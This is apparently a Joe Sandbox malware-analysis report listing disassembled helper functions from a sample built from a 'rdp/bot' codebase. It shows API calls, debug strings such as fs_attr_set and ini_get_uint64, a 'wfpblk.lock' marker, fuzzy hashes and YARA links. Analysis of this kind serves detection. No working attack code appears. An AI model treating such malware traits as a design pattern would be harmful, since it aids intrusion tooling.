[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FF66EBA673B
((*path_sz) > 0), xrefs: 00007FF66EBA66F3
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA668C, 00007FF66EBA66BC, 00007FF66EBA66EC
fs_path_temp, xrefs: 00007FF66EBA6667, 00007FF66EBA669A, 00007FF66EBA66CA, 00007FF66EBA66FA, 00007FF66EBA6734
NULL, xrefs: 00007FF66EBA676D
(path != NULL), xrefs: 00007FF66EBA6693

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3302659514
Opcode ID: d83c6a3c5cd261ce9a318162082d5d79cdfe15b1520245b8fa0dadd1a1ca9e88
Instruction ID: f88547cbf62fc5a5e807cb057d0dc66dce3baa405ab2afbd6d5cfed64a21648f
Opcode Fuzzy Hash: d83c6a3c5cd261ce9a318162082d5d79cdfe15b1520245b8fa0dadd1a1ca9e88
Instruction Fuzzy Hash: 89415FA1D58543C2FE218F5CA7803F92271BF6A744F584132FA5E8F699EE7CE5068308

Function 00007FF66EBAA3E1 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF66EBAA4A6
GetProcessHeap.KERNEL32 ref: 00007FF66EBAA4B4
HeapAlloc.KERNEL32 ref: 00007FF66EBAA4C5
strlen.MSVCRT ref: 00007FF66EBAA4E3
GetProcessHeap.KERNEL32 ref: 00007FF66EBAA511
HeapFree.KERNEL32 ref: 00007FF66EBAA522

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBAA45B, 00007FF66EBAA48B
ini_get_bytes, xrefs: 00007FF66EBAA454, 00007FF66EBAA484
(buf_sz != NULL), xrefs: 00007FF66EBAA47D
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF66EBAA537
(buf != NULL), xrefs: 00007FF66EBAA44D
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF66EBAA446, 00007FF66EBAA476
mem_alloc, xrefs: 00007FF66EBAA530

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3964590784
Opcode ID: 4404ab7bd78e9f675a43a75cd588106154e51a932e660b712f82990b79d880dd
Instruction ID: 2566092b0a45ac1126ab46e7ef0534e30ba0e011e404262d87b6f1a1f29bb58f
Opcode Fuzzy Hash: 4404ab7bd78e9f675a43a75cd588106154e51a932e660b712f82990b79d880dd
Instruction Fuzzy Hash: 6431BF21E49A43C6FE509F19EA843B92270EF6AB84F480035F90DCF6A5DF3CE8058758

Function 00007FF66EBA3B64 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF66EBA3C3E

Part of subcall function 00007FF66EBA3909: GetFileAttributesA.KERNEL32 ref: 00007FF66EBA392A

SetFileAttributesA.KERNEL32 ref: 00007FF66EBA3BAB

Strings

[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FF66EBA3D24
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA3BDE, 00007FF66EBA3C09
(attr != NULL), xrefs: 00007FF66EBA3BFB
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA3BC9, 00007FF66EBA3BF4
fs_attr_set, xrefs: 00007FF66EBA3BD7, 00007FF66EBA3C02, 00007FF66EBA3C4E, 00007FF66EBA3D1D, 00007FF66EBA3D83
NULL, xrefs: 00007FF66EBA3D74
(path != NULL), xrefs: 00007FF66EBA3BD0
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF66EBA3C55
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF66EBA3D8A

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3085771803
Opcode ID: 8aa29dc37d62777a809154e9360e5bfa92268c89cb73e41a97105e0a2c2a5b39
Instruction ID: 5ccf3a80f8b7d1dcf7aa8cf8ed29ab6a9d3ae6d858d795afe79f04caa8837742
Opcode Fuzzy Hash: 8aa29dc37d62777a809154e9360e5bfa92268c89cb73e41a97105e0a2c2a5b39
Instruction Fuzzy Hash: 97515361D4C747C7FE608B189B8827D6270EF2A744F244032F55ECE6A5EE6CE945C709

Function 00007FF66EBA6263 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32 ref: 00007FF66EBA62AB
CloseHandle.KERNEL32 ref: 00007FF66EBA62BC

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

GetLastError.KERNEL32 ref: 00007FF66EBA6372

Strings

((*lock) != INVALID_HANDLE_VALUE), xrefs: 00007FF66EBA6324
[I] (%s) -> Done(lock=%p), xrefs: 00007FF66EBA62CC
fs_file_unlock, xrefs: 00007FF66EBA62C5, 00007FF66EBA62FA, 00007FF66EBA632B, 00007FF66EBA6356, 00007FF66EBA6380
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA6301, 00007FF66EBA6332
(lock != NULL), xrefs: 00007FF66EBA62F3
[E] (%s) -> Failed(lock=%p,err=%08x), xrefs: 00007FF66EBA635D
[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu), xrefs: 00007FF66EBA6387
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA62EC, 00007FF66EBA631D

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseErrorFileHandleLastUnlockfflushfwrite
String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
API String ID: 497672076-1436771859
Opcode ID: d869a549eb8474e760af3095ab5c6dc71d70420fef9985a515a8ade6337b116d
Instruction ID: d1000acebb022640bce2d3cdf8c624c25e6d1ca2ea6ec82120fd965e54f17e5d
Opcode Fuzzy Hash: d869a549eb8474e760af3095ab5c6dc71d70420fef9985a515a8ade6337b116d
Instruction Fuzzy Hash: C24140B1F5C543D2FE20871DE7846B826B0EF7BB58F140232E51E8F5E99E2CA5468349

Function 00007FF66EBA8008 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF66EBA8019
GetProcessHeap.KERNEL32 ref: 00007FF66EBA804F
HeapAlloc.KERNEL32 ref: 00007FF66EBA8063
wcslen.MSVCRT ref: 00007FF66EBA8080
GetProcessHeap.KERNEL32 ref: 00007FF66EBA8093
HeapAlloc.KERNEL32 ref: 00007FF66EBA80A7
memcpy.MSVCRT ref: 00007FF66EBA80CF

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

Part of subcall function 00007FF66EBA14E2: EnterCriticalSection.KERNEL32 ref: 00007FF66EBA15B3
Part of subcall function 00007FF66EBA14E2: LeaveCriticalSection.KERNEL32 ref: 00007FF66EBA15DB
Part of subcall function 00007FF66EBA14E2: CopyFileA.KERNEL32 ref: 00007FF66EBA1638

GetProcessHeap.KERNEL32 ref: 00007FF66EBA8114
HeapFree.KERNEL32 ref: 00007FF66EBA8125

Strings

mem_alloc, xrefs: 00007FF66EBA80DF, 00007FF66EBA80FA
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF66EBA80E6, 00007FF66EBA8101

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
API String ID: 4155868088-3920367287
Opcode ID: 3b4e7a34a9129897ff6d3e2a171b92da40ceb2305707a17cd7f02296e5fef9ac
Instruction ID: 2ddb65d8b2d4e5c4140821a1513be9728822e549ea6fb336366c6c526d0d032c
Opcode Fuzzy Hash: 3b4e7a34a9129897ff6d3e2a171b92da40ceb2305707a17cd7f02296e5fef9ac
Instruction Fuzzy Hash: C9316631A49A87C6FB609B09E5D43796371EB6E740F444031EA8DCB795DE2CE945C305

Function 00007FF66EBA6A5C Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF66EBA6A8B
GetLastError.KERNEL32 ref: 00007FF66EBA6A96

Strings

fs_module_path, xrefs: 00007FF66EBA6AAE, 00007FF66EBA6AE7, 00007FF66EBA6B1B, 00007FF66EBA6B4B, 00007FF66EBA6B7E
(path_sz != NULL), xrefs: 00007FF66EBA6B77
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF66EBA6AEE
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA6B22, 00007FF66EBA6B52, 00007FF66EBA6B85
[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF66EBA6AB5
(hnd != NULL), xrefs: 00007FF66EBA6B14
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA6B0D, 00007FF66EBA6B3D, 00007FF66EBA6B70
(path != NULL), xrefs: 00007FF66EBA6B44
wfpblk.lock, xrefs: 00007FF66EBA6A5C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
API String ID: 2776309574-2006444783
Opcode ID: 8b0743739006594648491150ba1350e979c194a544b87ff4122521ba6a39c257
Instruction ID: e905451809a38fc1bbf251ebcc4909fc900512828c08f0653afc6ff066a9adb2
Opcode Fuzzy Hash: 8b0743739006594648491150ba1350e979c194a544b87ff4122521ba6a39c257
Instruction Fuzzy Hash: A0312CA1E58907D6EA11CB5CEB807B52270FB2AB48F484031F94C9F5A5EE7CA909C348

Function 00007FF66EBA5923 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF66EBA5969
GetFileSize.KERNEL32 ref: 00007FF66EBA598C
CloseHandle.KERNEL32 ref: 00007FF66EBA59AE
GetLastError.KERNEL32 ref: 00007FF66EBA5A34
GetLastError.KERNEL32 ref: 00007FF66EBA5AFA

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA59F1, 00007FF66EBA5A21
fs_file_size, xrefs: 00007FF66EBA59EA, 00007FF66EBA5A1A
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA59DC, 00007FF66EBA5A0C
(size != NULL), xrefs: 00007FF66EBA5A13
(path != NULL), xrefs: 00007FF66EBA59E3

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-1687387729
Opcode ID: 5d5a14a54e9484cbab1cd010350adeadcfcef428cfff90e7ea5d769dac30547b
Instruction ID: 3fff52f3084f99e41e50426785d4b328a32d6204b9201d7b74ede2a7a6cb5fb0
Opcode Fuzzy Hash: 5d5a14a54e9484cbab1cd010350adeadcfcef428cfff90e7ea5d769dac30547b
Instruction Fuzzy Hash: DC612BA1E4E112C3FE304A18A6843791270EF7B364F294532E55ECE2D4DE6CAE85425E

Function 00007FF66EBA3222 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 87synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF66EBA3233
GetLastError.KERNEL32 ref: 00007FF66EBA328C

Strings

, xrefs: 00007FF66EBA32AE
~, xrefs: 00007FF66EBA330E
[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu), xrefs: 00007FF66EBA32A2
P, xrefs: 00007FF66EBA3313
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA3279
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF66EBA3264
process_wait, xrefs: 00007FF66EBA3272, 00007FF66EBA329B
(pi != NULL), xrefs: 00007FF66EBA326B

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
API String ID: 1211598281-4195011794
Opcode ID: b4923bec754530ad8a3058dc3744fbddecf07832d11223e4b9a3b7cab9c595a8
Instruction ID: df169cf9b2250caf291cf8caee04cb37431d572533c2eba9892c6f307674b080
Opcode Fuzzy Hash: b4923bec754530ad8a3058dc3744fbddecf07832d11223e4b9a3b7cab9c595a8
Instruction Fuzzy Hash: 50319310E8C303C3FE749658A7C83BC12A1DF6F718F245132F61FCE2919D5DAA85924A

Function 00007FF66EBA5C44 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF66EBA5CA3
GetFileTime.KERNEL32 ref: 00007FF66EBA5CBE
GetLastError.KERNEL32 ref: 00007FF66EBA5CCC
CloseHandle.KERNEL32 ref: 00007FF66EBA5DEE

Strings

(ctime != NULL) || (atime != NULL) || (mtime != NULL), xrefs: 00007FF66EBA5D33
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA5D0E, 00007FF66EBA5D41
fs_file_stat, xrefs: 00007FF66EBA5D07, 00007FF66EBA5D3A
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA5CF9, 00007FF66EBA5D2C
(path != NULL), xrefs: 00007FF66EBA5D00

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
API String ID: 2291555494-3647951244
Opcode ID: f5874e6d9fd79edc16e3fcdb1e0a82f9b792a992b4e314340fe334aba537bf0d
Instruction ID: e6c1ce11bff95416c0d8f33b19ebad3a5e6574fe3404c3c5fe9cbd311c3a67e6
Opcode Fuzzy Hash: f5874e6d9fd79edc16e3fcdb1e0a82f9b792a992b4e314340fe334aba537bf0d
Instruction Fuzzy Hash: D1515161D4E102C7FE204A18E7487792270EF3A7A4F184531F95DDF2D4DE6DAA85834D

Function 00007FF66EBAA264 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF66EBAA300
_strtoui64.MSVCRT ref: 00007FF66EBAA316
_errno.MSVCRT ref: 00007FF66EBAA320
_errno.MSVCRT ref: 00007FF66EBAA32C

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBAA2E6
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF66EBAA353
(value != NULL), xrefs: 00007FF66EBAA2D8
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF66EBAA2D1
ini_get_uint64, xrefs: 00007FF66EBAA2DF, 00007FF66EBAA34C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: fc877ab81f5fb23771bc5c5e661677e6874be47513df3575e552a72b653aff37
Instruction ID: e755637d1c7d8bd7d5bcda830f4f05e7e8666ade5305f3cc7884c89eb4a8db7e
Opcode Fuzzy Hash: fc877ab81f5fb23771bc5c5e661677e6874be47513df3575e552a72b653aff37
Instruction Fuzzy Hash: B0219121A08B46C6E6518F19F9807AA3372FB6A784F444032FE4C8B654DF3DD985C708

Function 00007FF66EBAA824 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF66EBAA8CD
VirtualProtect.KERNEL32 ref: 00007FF66EBAA935
GetLastError.KERNEL32 ref: 00007FF66EBAA93F

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF66EBAA829
Mingw-w64 runtime failure:, xrefs: 00007FF66EBAA7EB
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF66EBAA8E2
Address %p has no image-section, xrefs: 00007FF66EBAA885
VirtualProtect failed with code 0x%x, xrefs: 00007FF66EBAA945

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 637304234-2693646698
Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
Instruction ID: 55e846075b8a20ff0cfb32244a79943cec3351fd5e3f188500d04165bd1adf76
Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
Instruction Fuzzy Hash: BC318231F05A03C6EE108F19EA811796375EB6EB90B448135EE1D8F364DE3CE4458B48

Function 00007FF66EBA9F70 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF66EBAA00E
_errno.MSVCRT ref: 00007FF66EBAA02C
_errno.MSVCRT ref: 00007FF66EBAA034

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA9FF4
[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF66EBAA05C
ini_get_uint16, xrefs: 00007FF66EBA9FED, 00007FF66EBAA055
(value != NULL), xrefs: 00007FF66EBA9FE6
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF66EBA9FDF

Memory Dump Source

